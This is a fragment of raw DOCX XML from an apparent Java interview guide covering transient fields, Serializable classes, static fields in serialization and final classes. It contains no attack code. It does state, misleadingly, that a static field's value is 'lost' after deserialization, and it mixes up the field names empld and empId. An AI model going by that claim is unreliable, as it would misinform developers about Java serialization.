    <w:p w14:paraId="4671849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6ED480" w14:textId="03595E15" w:rsidR="006507DC" w:rsidRPr="00CE4B95"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148236EE" w14:textId="77E6C70A" w:rsidR="00A014B4" w:rsidRPr="00CE4B95" w:rsidRDefault="00A014B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc197867225"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of the transient keyword in serialization?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6282176F" w14:textId="466D6497" w:rsidR="00A014B4" w:rsidRPr="00CE4B95" w:rsidRDefault="00E46495">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eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>transient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00F54E48" w:rsidP="00F54E48">
      <w:p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1EB208D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2F09649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665AC5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9115C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39FDC93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his field will not be serialized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D0CD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D833181"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0F1D0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7DA208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ala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761E228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203058"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56EB97E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3057F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4AB2B53"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9B00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D38C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3B7A56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47511E7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0A57A2"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0514B3AB" w14:textId="5EC1BA4A"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estSerializa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63D4EB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0065D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50000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4EDF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DCB88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 the object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419ED0A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000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fileOu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04B8764F"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Out</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F7909"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mp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F31AE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145CA29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0D6EA1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDFC07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 the object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E740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000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fileI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63A6A7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In</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7097C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deserialized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797C39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2DACA1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2C0F6C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FC7011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the deserialized object's fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2082757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Nam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p>
    <w:p w14:paraId="47E0944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alary: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ill be 0 since it's transient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA5E11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37E666" w14:textId="15E7FC0C"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785C126C" w14:textId="77777777" w:rsidR="00F54E48" w:rsidRPr="00CE4B95" w:rsidRDefault="00F54E48" w:rsidP="00F54E48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In this example,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is marked as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, so when the object is serialized and then deserialized,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will not retain its value and will default to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the deserialized object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9683B3" w14:textId="1BC0F389" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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CE4B95" w:rsidRDefault="000352E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc197867226"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can I m</w:t>
      </w:r>
      <w:r w:rsidR="006F7750" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ake</w:t>
      </w:r>
      <w:r w:rsidR="00250003" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> below</w:t>
      </w:r>
      <w:r w:rsidR="006F7750" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Employee class as Serializable class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="40CC860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570C45C"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BE04F3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4E3BF78"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2A38470" w14:textId="63148563"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w:t>
      </w:r>
      <w:r w:rsidR="003155C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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376B750"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7539E27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p>
    <w:p w14:paraId="212A011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125F426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2D52151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5304FC58" w14:textId="41001DC0"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8A59AB5" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95" w:rsidRDefault="006F7750" w:rsidP="006F7750">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501D75EC" w14:textId="1AE8CBD2" w:rsidR="006F7750" w:rsidRPr="00CE4B95" w:rsidRDefault="006F7750">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715E114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0CA6BA6"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30908D75"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48F864A"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011F94FC"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A341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191BFB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1862E5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73AD30E9"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563A46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14B6CB72" w14:textId="595D9ED3"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3A7916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0E82171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BC1B0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5E64CCCE"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11D3B3"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32F3643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E57E121" w14:textId="0A563C68"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00EB0A68" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6478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7F717F61" w14:textId="04C81DBC"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656DBC48" w14:textId="6DBFC7BA" w:rsidR="006F7750" w:rsidRPr="00CE4B95" w:rsidRDefault="006F7750" w:rsidP="00F5251C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3335550E" w14:textId="77777777" w:rsidR="006E0F91" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0F91" w:rsidP="00152B85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F9398F" w14:textId="77777777" w:rsidR="0085166A" w:rsidRPr="00CE4B95" w:rsidRDefault="0085166A" w:rsidP="00152B85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02671027" w14:textId="0E69EEC2" w:rsidR="00152B85" w:rsidRPr="00CE4B95" w:rsidRDefault="00152B85" w:rsidP="00152B85">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46E34E15"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Implements Serializable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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serialVersionUID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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Field Naming Correction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixed the typo in the field names (linel to line1 and adress to address).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB3B16B" w14:textId="77777777" w:rsidR="00152B85" w:rsidRPr="00CE4B95" w:rsidRDefault="00152B85" w:rsidP="00152B85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B9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CE4B95"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CE4B95" w:rsidRDefault="00AE43EF" w:rsidP="00CE1F88">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc197867227"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00AE43EF">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f empId is declared as static in the Employee class, it will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not be serialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00AE43EF" w:rsidP="00AE43EF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here's what will happen when empId is static:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398B9DC" w14:textId="7F6A4258" w:rsidR="00AE43EF" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36" w:rsidP="00F5251C">
      <w:pPr>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7215CDE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9888A8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163844A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07AD7C3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258294B5"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8FB7FA"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2D91AB9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48709B6B"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307305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5D7271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0A0480B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69CBC081"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8A4F9A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field (will not be serialized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C09EE2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2403403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BC442CC"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34F66"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6849B3E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l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E867E9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o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38B2C45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ddres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3D221518"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5F90000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25CE86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314B85B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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4638C9" w14:textId="77777777" w:rsidR="00BA6632" w:rsidRPr="00CE4B95"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7C373C22"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E0ADDCF"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31EC38F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E527C2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Pr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D71B9E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39C77675" w14:textId="3A7DDB15"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4474EDDB" w14:textId="77777777" w:rsidR="00AE43EF" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE43EF" w:rsidP="00F5251C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17113A31"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t>What happens during serialization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF22B84"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The instance fields (name, empld, dob, address) of the Employee class will be serialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C25E6"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static field (empId) will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> be serialized because it is tied to the class, not the individual object instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C68BD9"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After deserialization, the value of the empId field will be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lost</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Example of behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59859EC5"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Before Serialization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7628DBF5"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 "12345" (static)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B3187"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 "E123" (instance field)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF7D4B2"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After Serialization and Deserialization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A78388"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will retain its value (e.g., "E123").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596DF490"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CE4B95" w:rsidRDefault="00EB4E36" w:rsidP="00EB4E36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95"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CE4B95" w:rsidRDefault="00B40963">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc197867228"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the final class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="2E958F58" w14:textId="3507DD2E" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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a final class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA8E3A2" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="00BF7479">
      <w:pPr>
        <w:ind w:firstLine="360"/>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final class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a class that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot be extended (inherited)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D900AFB"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021340"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code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FC701" w14:textId="2C49DB94"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775704C3" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once a class is marked as final, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no other class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can subclass it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605EAC97"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CE4B95" w14:paraId="6FA645AA" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="227CEE0A"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DC4BD7E"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126041" w:rsidRPr="00CE4B95" w14:paraId="7A5456CB" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58CB821E"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Avoid accidental or malicious subclassing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="1C8D2307" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1092945F"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ecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6252C64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akes class behavior predictable and secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="33B15149" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D8594D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JVM can make certain optimizations as it knows the class won't change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="7EB4D565" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3488276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Helps in creating immutable or well-contained utility classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A6B753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A86E72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EC4C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heckPermi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B082B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mission granted."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893F1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9D1B46" w14:textId="5184F611"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40ED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This will cause a compile-time error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDFB2A1"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47EC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not inherit from final class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA5BAE" w14:textId="0BB25D16"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286D94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life Example: java.lang.String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113BBF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200DE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ring class is final in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AD0AA3" w14:textId="6F0C1232"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9769CA1" w14:textId="77777777" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why? Because String is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
